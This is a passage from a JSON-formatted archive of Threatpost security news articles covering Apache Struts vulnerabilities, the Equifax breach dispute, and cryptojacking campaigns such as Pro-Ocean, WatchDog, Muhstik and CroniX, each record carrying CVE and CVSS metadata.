This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The 
letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. 
There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. 
Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. 
I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. 
[pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeatedly by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected, multiple lawsuits have been filed against the company in the wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m.
to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-01-28T21:55:45", "description": "Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.\n\nThe malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed up with \u201cworm\u201d capabilities and rootkit detection-evasion features.\n\n\u201cThis malware is an example that demonstrates that cloud providers\u2019 agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\u201d said Aviv Sasson with Palo Alto Networks [on Thursday](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>). \u201cAs we saw, this sample has the capability to delete some cloud providers\u2019 agents and evade their detection.\u201d\n\nSince [its discovery in 2018](<https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/>), the Rocke Group has widened its [targeting of cloud applications](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>) \u2013 including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis \u2013 for mining Monero.
Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group\u2019s latest update aims to sidestep these detection and mitigation efforts.\n\n## **Pro-Ocean Malware**\n\nPro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a [critical flaw in Apache ActiveMQ](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>) (CVE-2016-3088) and [a high-severity vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>) in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecure instances of Redis.\n\nOnce downloaded, the malware attempts to remove other malware and cryptominers, including [Luoxk](<https://blog.netlab.360.com/malicious-campaign-luoxk-is-actively-exploiting-cve-2018-2893/>), [BillGates](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf>), [XMRig](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and [Hashfish](<https://virus-removal-guide.net/34710-is-the-hashfish-exe-file-legal-how-to-remove-hashfish-exe-trojan-coinminer/>). It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.\n\nThe malware is made up of four components: A rootkit module that installs a rootkit and other various malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search any processes using CPU heavily); and an infection module that contains \u201cworm\u201d capabilities.\n\n## **New Features**\n\nThe latter \u201cworm\u201d feature is a new add for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim\u2019s machine. 
It does so by accessing an online service at the address \u201cident.me,\u201d which reports the public IP address of whoever queries it. Then, the script tries to infect all the machines in the same 16-bit subnet (e.g. 10.0.X.X).\n\n\u201cIt does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,\u201d said Sasson.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/28143636/word-image-4.png>)\n\nPro-Ocean\u2019s modular structure. Credit: Palo Alto Networks\n\nOther threat groups have previously added worm-like functionality to their Monero-chugging malware. TeamTNT\u2019s cryptomining worm, for instance, [was found spreading through](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) the Amazon Web Services (AWS) cloud and collecting credentials in August.\n\nThe Pro-Ocean malware has also added new rootkit capabilities that cloak its malicious activity.\n\nThese updated features exist in [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>), a library for hiding processes used by the malware.
This library was utilized by previous versions of Pro-Ocean \u2013 however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.\n\nFor example, before calling the libc function open (libc is the C standard library, whose functions are available to all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.\n\n\u201cIf it determines that the file needs to be hidden, the malicious function will return a \u2018No such file or directory\u2019 error, as if the file in question does not exist,\u201d said Sasson.\n\nResearchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the [cloud grows as a lucrative target for attackers](<https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/>).\n\n\u201cCryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.\u201d\n
", "cvss3": {}, "published": "2021-01-28T20:06:57", "type": "threatpost", "title": "Rocke Group\u2019s Malware Now Has Worm Capabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271", "CVE-2018-2893"], "modified": "2021-01-28T20:06:57", "id": "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "href": "https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-17T21:39:31", "description": "Cryptocurrency-mining malware, called WatchDog, has been running under the radar for more than two years \u2013 in what researchers call one of the largest and longest-lasting Monero cryptojacking attacks to date.\n\nThe attack is still in operation as of this writing \u2013 and due to the size and scope of the infrastructure, it will be difficult to fully contain, researchers told Threatpost. Thus far, attackers have hijacked at least 476 Windows and Linux devices, in order to abuse their system resources for mining Monero cryptocurrency.\n\nRight now, the attackers behind this campaign are sticking to cryptojacking \u2013 but researchers warn that it is \u201chighly likely\u201d they could find identity and access management (IAM) data on previously-compromised cloud systems, due to the root and administrative access that\u2019s acquired during the malware implantation.
This could open the door for future \u2013 and more dangerous \u2013 attacks.\n\n\u201cIt is clear that the WatchDog operators are skilled coders and have enjoyed a relative lack of attention regarding their mining operations,\u201d said researchers with Palo Alto Networks [on Wednesday](<https://unit42.paloaltonetworks.com/watchdog-cryptojacking/>). \u201cWhile there is currently no indication of additional cloud compromising activity at present (i.e. the capturing of cloud platform identity and access management credentials, access ID or keys), there could be potential for further cloud account compromise.\u201d\n\n## **How Much Money Does Cryptomining Malware Make? **\n\nThe attack is a [prime example of cryptojacking](<https://threatpost.com/cryptojacking-attack-found-on-los-angeles-times-website/130041/>), which is when attackers leverage malicious cryptomining for financial profit. They do so by hacking into devices to install software, which then uses the devices\u2019 power and resources to mine for cryptocurrencies or to steal cryptocurrency wallets owned by the victims.\n\nSince it launched on Jan. 27, 2019, the WatchDog mining operation has collected at least 209 Monero cryptocurrency coins (XMR) \u2013 which is currently valued at $32,056. While this figure appears to be relatively low, the important piece of cryptojacking operations is not the immediate market price, but the total XMR mined, Nathaniel Quist, senior cloud threat researcher for Unit 42 at Palo Alto Networks, told Threatpost.\n\nAt the time of writing the research, the market price for Monero was $153. But, just within the last 24 hours, the market price of XMR has soared to $254, Quist explained \u2013 so as of Wednesday, WatchDog has actually collected $53,086.\n\n\u201cIn the past, we have seen dramatic swings in cryptocurrency valuations,\u201d Quist told Threatpost. 
\u201cDepending upon the market price over the next months, we could see cryptocurrency market prices touch the record highs that were seen back in early 2018, where Monero was valued at $469. If that were the case, WatchDog could increase its value total to $98,021 without mining another coin, making it a very profitable mining operation.\u201d\n\n## **WatchDog Malware: Go Binaries Drive Functionality**\n\nResearchers said the WatchDog mining malware is composed of a three-part Go Language binary set and a bash or PowerShell script file. Go, an open-source programming language, has previously been utilized by various cybercriminals for cryptojacking attacks, [including TeamTNT](<https://threatpost.com/blackt-cryptojacker-teamtnt/159853/>) and [the developers of ElectroRAT](<https://threatpost.com/electrorat-drains-cryptocurrency-wallet-funds-of-thousands/162705/>).\n\nWatchDog\u2019s Go binaries each perform a specific function \u2013 including one that emulates the Linux watchdog daemon functionality (hence the name of the malware, WatchDog) by ensuring that the mining process does not overload or stop unexpectedly. The watchdog daemon\u2019s functionality is to open the device and provide a necessary refresh to keep the system from resetting. For example, it can test process table space, memory usage and running processes.\n\n\u201cWatchDog\u2019s usage of Go binaries allows it to perform the stated operations across different operating systems using the same binaries\u2026 as long as the Go Language platform is installed on the target system,\u201d said researchers.\n\nThe Go binaries include a network scanner and exploitation binary (networkmanager), a process monitoring binary (phpguard), and a version of the malicious XMRig cryptomining software (phpupdate).\n\n## **The WatchDog Cryptojacking Campaign: Windows and Linux OS Under Attack**\n\nThe initial attack vector stems from the networkmanager binary.
When the binary identifies a vulnerable target, it attempts to compromise that identified system using a robust set of built-in application exploits.\n\nSpecifically, networkmanager comes loaded with 33 exploits, 32 individual remote code execution (RCE) functions and several shell grab functions. For instance, it scans for applications such as Elasticsearch servers that are vulnerable to CVE-2015-1427 and CVE-2014-3120 and Oracle WebLogic Servers vulnerable to CVE-2017-10271.\n\nFor context, this is a significant number of exploits when compared to other miners \u2013 [such as the Smominru cryptocurrency miner](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>), which operated from 2017 to 2018 and collected nearly 9,000 XMR, said Quist. Unlike Smominru\u2019s two exploits, WatchDog\u2019s numerous exploits and RCE functions \u201cmake it better at compromising exposed systems,\u201d he told Threatpost.\n\n## **WatchDog Compared to Graboid Cryptomining Malware**\n\nOf note, WatchDog is stealthier than other cryptomining malware, such as the wormable [Monero mining malware Graboid](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>). Discovered last year, Graboid was the largest known mining operation to date in terms of the total number of active systems.\n\nDuring the time of its operation, Graboid consisted of at least 2,000 systems with exposed and compromised Docker daemon APIs, and researchers said the malware could have also achieved \u201chigher processing speeds\u201d due to the configuration script utilizing all available container central processing units (CPUs).\n\nHowever, Graboid was only known to operate for up to three months before its Docker Hub images were removed. 
That\u2019s because the malware relied on a third party (Docker Hub) to host its malicious payload \u2013 whereas WatchDog does not, allowing it to remain active for more than two years, said researchers.\n\nIn fact, WatchDog has a fairly extensive infrastructure behind its mining operations, with researchers mapping out 18 root IP endpoints and seven malicious domains, which serve at least 125 malicious URL addresses used to download its toolset.\n\n## **Cryptojacking: A Cyberattack on the Rise**\n\nWatchDog comes as the value of cryptocurrency has exploded, making cryptojacking a lucrative type of financial attack for cybercriminals. The XMR market value follows the cryptocurrency prices of Bitcoin \u2013 which as of Wednesday set a record-high topping $51,000.\n\nXMR has subsequently increased in value from $153 on February 9 to $254 on Wednesday \u2013 approaching its highest-recorded value of $469.79 (set in January 2018), Quist told Threatpost.\n\n\u201cCybercriminals are watching the market value of XMR,\u201d Quist told Threatpost. \u201cOver the last six months, Unit 42 researchers have seen a 40 percent increase in network traffic to public mining pools, which indicates that more mining operations are taking place. The trend of more XMR mining operations appears to be following the increasing market value price of XMR.\u201d\n\nThis week, researchers with Kaspersky also found that distributed denial-of-service (DDoS) attacks dropped significantly at the end of 2020, down 31 percent in the fourth quarter, as cybercriminals switch their efforts to cryptomining. 
[According to the analysis this week](<https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/>), cybercriminals began repurposing infected devices for cryptomining in response to rising cryptocurrency values.\n\nOne such [recently discovered malware](<https://threatpost.com/new-malware-hijacks-kubernetes-clusters-to-mine-monero/163629/>), dubbed Hildegard, was found being leveraged by the TeamTNT threat group to target Kubernetes clusters with cryptojacking attacks. In January, [researchers also identified an updated malware variant](<https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/>) used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks. And, in January, [researchers dug up new discoveries](<https://threatpost.com/sql-server-malware-tied-to-iranian-software-firm-researchers-allege/163230/>) surrounding a cryptomining operation, called MrbMiner, which was downloading a cryptominer on thousands of internet-facing SQL servers.\n
", "cvss3": {}, "published": "2021-02-17T21:39:10", "type": "threatpost", "title": "Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271"], "modified": "2021-02-17T21:39:10", "id": "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "href": "https://threatpost.com/windows-linux-devices-hijacked-in-two-year-cryptojacking-campaign/164048/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-08T11:51:46", "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Network\u2019s Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). \u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. 
The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to a remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. 
\u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. 
\u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "cvss3": {}, "published": "2019-05-01T14:11:11", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-10-30T07:20:19", "description": "The Apache Software Foundation warned in an advisory that the latest version of the Commons FileUpload library is susceptible to a two-year-old remote code execution flaw. Users of the vulnerable library must update their projects manually.\n\nThe critical bug in Commons FileUpload library is a known vulnerability ([CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>)) that enables remote code execution in the open-source framework, which facilitates developing web applications in the Java programming language.\n\nEssentially a Java Object exists in the Apache Commons FileUpload library that can be manipulated so that when it is deserialized, it can write or copy files to disk in arbitrary locations.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d according to the Monday [advisory](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>). 
\u201cYour project is affected if it uses the built-in file upload mechanism of Struts 2, which defaults to the use of commons-fileupload. The updated commons-fileupload library is a drop-in replacement for the vulnerable version. Deployed applications can be hardened by replacing the commons-fileupload jar file in WEB-INF/lib with the fixed jar.\u201d\n\nThe vulnerable commons-fileupload library is used in Apache Struts versions 2.3.36 and prior, the Foundation said in a Monday advisory. They urged users to upgrade to the latest released version of Commons FileUpload library \u2013 which is 1.3.3.\n\nThe vulnerability is reminiscent of [CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), another critical remote code execution Apache vulnerability behind the massive 2017 Equifax breach that led to the compromise of 143 million Americans\u2019 data.\n\nWhile that Apache Struts vulnerability (impacting the Jakarta based file upload Multipart parser) was patched back in March 2017, the consumer credit reporting agency didn\u2019t apply patches for two months after the flaw\u2019s disclosure \u2013 eventually leading to the groundbreaking breach.\n\nSimilarly, this latest deserialization vulnerability was disclosed and patched in commons-fileupload in [March,](<https://issues.apache.org/jira/browse/FILEUPLOAD-279>) but a new version of Struts that became available since then \u2013 version 2.3.36, released in October \u2013 still shipped with vulnerable versions of the library.\n\nStruts versions 2.5.12 and later are not affected, as this newer version of Struts includes a patched commons-fileupload component.\n\nUsers can mitigate the risk by replacing the faulty library manually.\n\n\u201cThere is no simple \u2018new Struts version\u2019 to fix this,\u201d said Johannes Ullrich, dean of research at the SANS Institute, in a blog [post](<https://isc.sans.edu/diary/rss/24278>) on Monday. 
\u201cYou will have to swap out the commons-fileupload library manually.\u201d\n\n\u201cAnd while you are at it: Double check that you don\u2019t have any other copies of the vulnerable library sitting on your systems,\u201d he added. \u201cStruts isn\u2019t the only one using it, and others may have neglected to update it as well.\u201d\n\nIt is only the latest security issue to afflict Apache Struts \u2013 earlier in August for instance, a critical remote code-execution vulnerability in Apache Struts 2 was [disclosed](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>).\n", "cvss3": {}, "published": "2018-11-06T12:27:15", "type": "threatpost", "title": "Apache Struts Warns Users of Two-Year-Old Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1000031", "CVE-2017-5638", "CVE-2019-11043"], "modified": "2018-11-06T12:27:15", "id": "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "href": "https://threatpost.com/apache-struts-warns-users-of-two-year-old-vulnerability/138820/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. 
Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on GitHub and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. 
